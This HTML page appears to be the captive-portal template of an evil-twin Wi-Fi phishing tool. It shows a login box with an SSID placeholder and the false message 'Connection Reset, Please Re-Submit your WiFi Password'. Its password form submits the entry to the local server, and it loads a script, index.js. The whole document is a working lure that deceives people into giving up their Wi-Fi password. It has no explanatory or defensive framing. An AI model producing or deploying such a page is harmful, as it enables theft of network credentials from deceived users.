<html style="-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;-o-box-sizing:border-box;box-sizing:border-box;width:100%;height:100%;overflow:hidden;">
<body style="-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;-o-box-sizing:border-box;box-sizing:border-box;width:100%;height:100%;font-family:'Open Sans', sans-serif;background:-webkit-radial-gradient(0% 100%, ellipse cover, rgba(104,128,138,.4) 10%,rgba(138,114,76,0) 40%), linear-gradient(to bottom,  rgba(57,173,219,.25) 0%,rgba(42,60,87,.4) 100%), linear-gradient(135deg,  #670d10 0%,#092756 100%);filter:progid:DXImageTransform.Microsoft.gradient( startColorstr='#3E1D6D', endColorstr='#092756',GradientType=1 );">  
<meta name="viewport" content="width=device-width, initial-scale=1.0, minimal-ui">
<div class="login" style="-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;-o-box-sizing:border-box;box-sizing:border-box;position:absolute;top:50%;left:50%;margin:-150px 0 0 -150px;width:300px;height:300px;">
<h1 style="-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;-o-box-sizing:border-box;box-sizing:border-box;color:#fff;text-shadow:0 0 10px rgba(0,0,0,0.3);letter-spacing:1px;text-align:center;"><span class="container" id="ssid">ssid</span></h1><p><center>Connection Reset <br> Please Re-Submit your WiFi Password</p></center><br>
    <form action='/' method='get' style="-webkit-box-sizing:border-box; -moz-box-sizing:border-box; -ms-box-sizing:border-box; -o-box-sizing:border-box; box-sizing:border-box;">


    <input type=password name=password placeholder="Password" required="required" style="-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;-o-box-sizing:border-box;box-sizing:border-box;width:100%;margin-bottom:10px;background:rgba(0,0,0,0.3);border:1px solid rgba(0,0,0,0.3);outline:none;padding:10px;font-size:13px;color:#fff;text-shadow:1px 1px 1px rgba(0,0,0,0.3);border-radius:4px;box-shadow:inset 0 -5px 45px rgba(100,100,100,0.2), 0 1px 1px rgba(255,255,255,0.2);-webkit-transition:box-shadow .5s ease;-moz-transition:box-shadow .5s ease;-o-transition:box-shadow .5s ease;-ms-transition:box-shadow .5s ease;transition:box-shadow .5s ease;"><input type=submit class="btn btn-primary btn-block btn-large" style="-webkit-box-sizing:border-box;-moz-box-sizing:border-box;-ms-box-sizing:border-box;-o-box-sizing:border-box;box-sizing:border-box;display:block;*display:inline;*zoom:1;padding:9px 14px;margin-bottom:0;font-size:15px;line-height:normal;color:#ffffff;text-align:center;text-shadow:1px 1px 1px rgba(0,0,0,0.4);vertical-align:middle;background-color:#4a77d4;background-image:linear-gradient(top, #6eb6de, #4a77d4);background-repeat:repeat-x;filter:progid:dximagetransform.microsoft.gradient(startColorstr=#6eb6de, endColorstr=#4a77d4, GradientType=0);border-color:rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.1) rgba(0, 0, 0, 0.25);border:1px solid #3762bc;-webkit-border-radius:5px;-moz-border-radius:5px;border-radius:5px;-webkit-box-shadow:inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05);-moz-box-shadow:inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.05);box-shadow:inset 0 1px 0 rgba(255, 255, 255, 0.2), 0 1px 2px rgba(0, 0, 0, 0.5);cursor:pointer;*margin-left:.3em;width:100%;" value="Connect">
    </form>
</div></body>
<script src="/index.js"></script>
</html>